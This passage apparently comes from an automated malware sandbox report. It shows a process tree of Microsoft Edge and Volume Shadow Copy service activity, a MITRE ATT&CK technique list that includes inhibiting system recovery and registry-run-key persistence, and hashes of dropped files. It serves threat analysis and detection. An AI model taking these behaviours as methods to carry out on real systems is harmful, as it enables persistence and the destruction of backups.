        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2
        5⤵
        
        PID:2600
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
        5⤵
        
        PID:2548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
        5⤵
        
        PID:4556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3440 /prefetch:1
        5⤵
        
        PID:2476
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5168 /prefetch:8
        5⤵
        
        PID:2812
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
        5⤵
        
        PID:2144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
        5⤵
        
        PID:3952
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3776 /prefetch:8
        5⤵
        
        PID:2392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:1
        5⤵
        
        PID:3880
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
        5⤵
        
        PID:3504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3816 /prefetch:8
        5⤵
        
        PID:3608
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:2824
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7f1665460,0x7ff7f1665470,0x7ff7f1665480
        6⤵
        
        PID:3720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3816 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1836
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
        5⤵
        
        PID:1300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:1
        5⤵
        
        PID:6024
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:8
        5⤵
        
        PID:6128
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6380 /prefetch:8
        5⤵
        
        PID:4124
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1840 /prefetch:8
        5⤵
        
        PID:5140
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1484,458356866709300403,17607894510655812967,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5792 /prefetch:8
        5⤵
        
        PID:5352

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1916

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\t2o7g3z

Filesize
3KB

MD5
3b2709348d47be54247950b967278fe6

SHA1
c3cdf2ae717e4b484c6ce1e348de2767b3039754

SHA256
f7926f6fcc99e95fdf63ce5c1b88e22ef5771f37f17fca8ceeab5dd3d8018780

SHA512
46563986cfd0bc11b679eb38308edc1a412288ddf697660e2d08b642772a16d08a449bc83455cda51ba148afd513188296b543a7048940fe9134501b2932d73f

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Users\Public\vovcg3567

Filesize
1KB

MD5
aa5892597800fa52ce0be1106d4cac4d

SHA1
fdaa8761529c32b68b5714b31b530c22ddb7b2b2

SHA256
82348f02222a47f5aa173864bdce1ead6ac1319e9cfd43c41bc5981426597693

SHA512
67b4c30e05527d4dc3d72391b4b96d1471d5a54e6f2a60bf034867df6b23df1cce0aecf4b1b92f8203ed8ebdc33036fc25ed2e2529a05dae88e948a3e01c5824

Download Submit
C:\Windows\Installer\MSI14A1.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
C:\Windows\Installer\MSI14A1.tmp

Filesize
1.1MB

MD5
13e790d06a0eb1e0135f5d3e2cd0ba02

SHA1
7fba1f17c598679c0676d04db5c891b2f04003a2

SHA256
9f2dbba04b9b3cdb7a90b691d74372f7314421986a33ef0340d7a3451474c0dd

SHA512
212c6abc51cd8ad262f1a88f41e9f961f19affd610c757a0c522a65412fef26d5cb826dc83518cd9aede768270a5901de2bd7e588c7b4ce4980b15b2394cd417

Download Submit
\??\Volume{2fb4ccdc-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5e608447-658e-4d56-856e-c4ad040de145}_OnDiskSnapshotProp

Filesize
5KB

MD5
42551310cd02358ff4b3c92e4754eaeb

SHA1
a35a6bdeed3f8f716ee5c25e25b64e79e1cd438b

SHA256
672389478b18356a0a93689f8413595edab71d6d9cb25e4351a6d7229b04d55e

SHA512
12d8ec6d0f12c95369860f54a18b7ec249f7a82e53e6ed261f152c2872a34df5c565c1e1731844b39dcf05ed2e03a146f3567f4167974fc1819a9f9207f2c766

Download Submit
\??\pipe\LOCAL\crashpad_2116_BSOJOLKPRJHFOWJO

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/436-137-0x0000000000000000-mapping.dmp

Download
memory/536-173-0x0000000000000000-mapping.dmp

Download
memory/1300-188-0x0000000000000000-mapping.dmp

Download
memory/1376-140-0x0000000000000000-mapping.dmp

Download
memory/1496-142-0x0000000000000000-mapping.dmp

Download
memory/1616-169-0x0000000000000000-mapping.dmp

Download
memory/1616-178-0x0000000000000000-mapping.dmp

Download
memory/1616-191-0x0000000000000000-mapping.dmp

Download
memory/1688-190-0x0000000000000000-mapping.dmp

Download
memory/1836-186-0x0000000000000000-mapping.dmp

Download
memory/1916-174-0x0000000000000000-mapping.dmp

Download
memory/1916-166-0x0000000000000000-mapping.dmp

Download
memory/2060-147-0x0000000000000000-mapping.dmp

Download
memory/2088-132-0x0000000000000000-mapping.dmp

Download
memory/2116-146-0x0000000000000000-mapping.dmp

Download
memory/2144-161-0x0000000000000000-mapping.dmp

Download
memory/2392-171-0x0000000000000000-mapping.dmp

Download
memory/2476-157-0x0000000000000000-mapping.dmp

Download
memory/2548-153-0x0000000000000000-mapping.dmp

Download
memory/2600-149-0x0000000000000000-mapping.dmp

Download
memory/2700-150-0x0000000000000000-mapping.dmp

Download
memory/2740-143-0x000001FCFCDF0000-0x000001FCFCDF3000-memory.dmp

Filesize
12KB

Download
memory/2812-159-0x0000000000000000-mapping.dmp

Download
memory/2824-184-0x0000000000000000-mapping.dmp

Download
memory/3436-176-0x0000000000000000-mapping.dmp

Download
memory/3484-177-0x0000000000000000-mapping.dmp

Download
memory/3504-182-0x0000000000000000-mapping.dmp

Download
memory/3648-168-0x0000000000000000-mapping.dmp

Download
memory/3720-185-0x0000000000000000-mapping.dmp

Download
memory/3864-164-0x0000000000000000-mapping.dmp

Download
memory/3880-180-0x0000000000000000-mapping.dmp

Download
memory/3880-167-0x0000000000000000-mapping.dmp

Download
memory/3952-163-0x0000000000000000-mapping.dmp

Download
memory/4124-206-0x0000000000000000-mapping.dmp

Download
memory/4148-172-0x0000000000000000-mapping.dmp

Download
memory/4208-133-0x0000000000000000-mapping.dmp

Download
memory/4208-141-0x0000021E97B70000-0x0000021E97C7F000-memory.dmp

Filesize
1.1MB

Download
memory/4264-145-0x0000000000000000-mapping.dmp

Download
memory/4328-189-0x0000000000000000-mapping.dmp

Download
memory/4556-155-0x0000000000000000-mapping.dmp

Download
memory/4640-165-0x0000000000000000-mapping.dmp

Download
memory/5140-208-0x0000000000000000-mapping.dmp

Download
memory/5180-192-0x0000000000000000-mapping.dmp

Download
memory/5196-193-0x0000000000000000-mapping.dmp

Download
memory/5228-194-0x0000000000000000-mapping.dmp

Download
memory/5312-195-0x0000000000000000-mapping.dmp

Download
memory/5352-210-0x0000000000000000-mapping.dmp

Download
memory/5368-196-0x0000000000000000-mapping.dmp

Download
memory/5376-197-0x0000000000000000-mapping.dmp

Download
memory/5392-198-0x0000000000000000-mapping.dmp

Download
memory/5524-199-0x0000000000000000-mapping.dmp

Download
memory/5548-200-0x0000000000000000-mapping.dmp

Download
memory/6024-202-0x0000000000000000-mapping.dmp

Download
memory/6128-204-0x0000000000000000-mapping.dmp

Download